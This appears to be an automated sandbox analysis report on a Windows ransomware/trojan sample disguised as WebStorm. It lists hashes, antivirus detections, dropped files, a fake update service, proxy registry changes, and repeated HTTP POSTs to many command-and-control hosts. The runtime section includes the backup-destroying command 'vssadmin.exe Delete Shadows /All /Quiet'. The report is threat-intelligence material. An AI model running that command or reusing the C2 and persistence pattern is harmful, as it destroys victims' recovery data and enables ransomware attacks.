Analysis Date2015-10-09 07:53:23
MD594c192ff42b04a8f5cb5b330a88397cd
SHA1214ad31a417a7021891e6def34cf3e590eb5d972

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a08107a3259e93f90317f4a895140cf3 sha1: 45a386bce7136077085ad8cfe4874d77c29dc791 size: 34816
Section.rdata md5: 7cfcc4086104bdf4ba4a7ecf78716940 sha1: 98ce087222b1df13dcdb1c4f2afbec744f7e4465 size: 15872
Section.data md5: bdae2097b9ecd4014a2126c3c89a1958 sha1: fdbd9356f80974f1a6d125c26c595f466944c31a size: 6144
Section.rsrc md5: 03b66258e968205984705a0515308b70 sha1: 536c68eb6bc80341302b8f65aa2db38e3dd57e58 size: 465408
Timestamp2015-01-29 14:15:22
VersionLegalCopyright: Copyright (C) 2000-2014 JetBrains s.r.o.
InternalName: webstorm.exe
FileVersion: 8.0.5.WS
CompanyName: JetBrains s.r.o.
ProductName: WebStorm
ProductVersion: 8.0.5.WS-135.1297
FileDescription: WebStorm
OriginalFilename: webstorm.exe
PackerMicrosoft Visual C++ ?.?
PEhash6b0885795a8ea3a0566d0f825e8477a931bd4c91
IMPhash8eec37f8d14b28b8ef4e4dfc8ac91c8f
AVRisingno_virus
AVCA (E-Trust Ino)Win32/Tnega.IBAaLb
AVF-SecureTrojan.Lethic.Gen.1
AVDr. WebTrojan.Betabot.3
AVClamAVWin.Trojan.Agent-843013
AVArcabit (arcavir)Trojan.Lethic.Gen.1
AVBullGuardTrojan.Lethic.Gen.1
AVPadvishno_virus
AVVirusBlokAda (vba32)SScope.Trojan.Agent.2315
AVCAT (quickheal)TrojanRansom.Crowti.MUE.A4
AVTrend Microno_virus
AVKasperskyTrojan.Win32.Generic
AVZillya!Trojan.Kryptik.Win32.656874
AVEmsisoftTrojan.Lethic.Gen.1
AVIkarusTrojan.Win32.Crypt
AVFrisk (f-prot)no_virus
AVAuthentiumW32/Rovnix.A.gen!Eldorado
AVMalwareBytesTrojan.Agent.0BGen
AVMicroWorld (escan)Trojan.Lethic.Gen.1
AVMicrosoft Security EssentialsRansom:Win32/Crowti!rfn
AVK7Trojan ( 004b4a7a1 )
AVBitDefenderTrojan.Lethic.Gen.1
AVFortinetW32/Kryptik.DJAS!tr
AVSymantecTrojan.Asprox.B
AVGrisoft (avg)Win32/Cryptor
AVEset (nod32)Win32/Kryptik.CWSU
AVAlwil (avast)Kryptik-PGE [Trj]
AVAd-AwareTrojan.Lethic.Gen.1
AVTwisterTrojanRansom.Foreign.lkre.wngi
AVAvira (antivir)TR/Crypt.Xpack.139709
AVMcafeeRansom-FWG!94C192FF42B0

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp

Creates FileC:\WINDOWS\FrameworkUpdate\Update.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\\\xe9\\xfa\\xbd\\xe9\\xce\\x92\\xe9\\xe7\\x93\\xe8\\xa6\\x9c
Creates Mutex_HSJ909NJJNJ90203_
Creates ServiceEnables the detection, download and installation of updates for Windows. - C:\WINDOWS\FrameworkUpdate\Update.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ C:\WINDOWS\FrameworkUpdate\Update.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS5.199.165.160
Winsock DNSfleep.com
Winsock DNSddiss.com
Winsock DNSevidentis.tv
Winsock DNStgp.com.my
Winsock DNSformagrafic.com
Winsock DNStgp.my
Winsock DNSlensprojapan.com
Winsock DNSnaomis-kitchen.com
Winsock DNSaquionics.net
Winsock DNS173.230.130.167
Winsock DNSterreal.com.my
Winsock DNSandyknife.com
Winsock DNSfleep.jp
Winsock DNScurlmyip.com
Winsock DNSblessedcode.net
Winsock DNSentramuntanats.org
Winsock DNSfutbolenelbar.com
Winsock DNSmacrobiotics-japan.com
Winsock DNSkslcity.com.my
Winsock DNSamaru.me
Winsock DNS94.247.28.29
Winsock DNSfleep.net
Winsock DNS91.121.12.127
Winsock DNSmyexternalip.com
Winsock DNSmlmsoftware.com.my
Winsock DNSlacubana.es
Winsock DNSip-addr.es

Process
↳ Pid 808

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1212

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1860

Process
↳ Pid 1192

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSkslcity.com.my
Type: A
103.18.247.250
DNSfleep.com
Type: A
219.94.235.33
DNSterreal.com.my
Type: A
103.18.247.250
DNSmlmsoftware.com.my
Type: A
43.252.215.197
DNStgp.my
Type: A
103.18.247.250
DNSaquionics.net
Type: A
103.18.247.250
DNSfleep.net
Type: A
219.94.235.33
DNStgp.com.my
Type: A
103.18.247.250
DNSlacubana.es
Type: A
95.215.62.77
DNSamaru.me
Type: A
219.94.235.33
DNSfleep.jp
Type: A
219.94.235.33
DNSformagrafic.com
Type: A
95.215.62.77
DNSandyknife.com
Type: A
95.215.62.77
DNSmacrobiotics-japan.com
Type: A
219.94.235.33
DNSfutbolenelbar.com
Type: A
95.215.62.77
DNSentramuntanats.org
Type: A
95.215.62.77
DNSddiss.com
Type: A
54.175.122.20
DNSnaomis-kitchen.com
Type: A
DNSblessedcode.net
Type: A
DNSlensprojapan.com
Type: A
DNSevidentis.tv
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://173.230.130.167:8080/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/nsatqgwlj1tjyad
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://173.230.130.167:8080/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/9zc5l8x7x98
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://173.230.130.167:8080/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/5oyvc0adqwu3bm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://173.230.130.167:8080/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/ukvwzoxy4fwrs
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://173.230.130.167:8080/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://terreal.com.my:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://mlmsoftware.com.my:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.my:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://aquionics.net:2525/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.net:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tgp.com.my:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://91.121.12.127:81/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://lacubana.es:8585/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://amaru.me:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://94.247.28.29:8080/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.jp:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://formagrafic.com:8585/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andyknife.com:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://macrobiotics-japan.com:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://futbolenelbar.com:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://5.199.165.160:2525/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entramuntanats.org:65535/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ddiss.com:8585/p0rd7b1y6upepc6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://kslcity.com.my:2525/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fleep.com:8081/fkps0lt1jw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
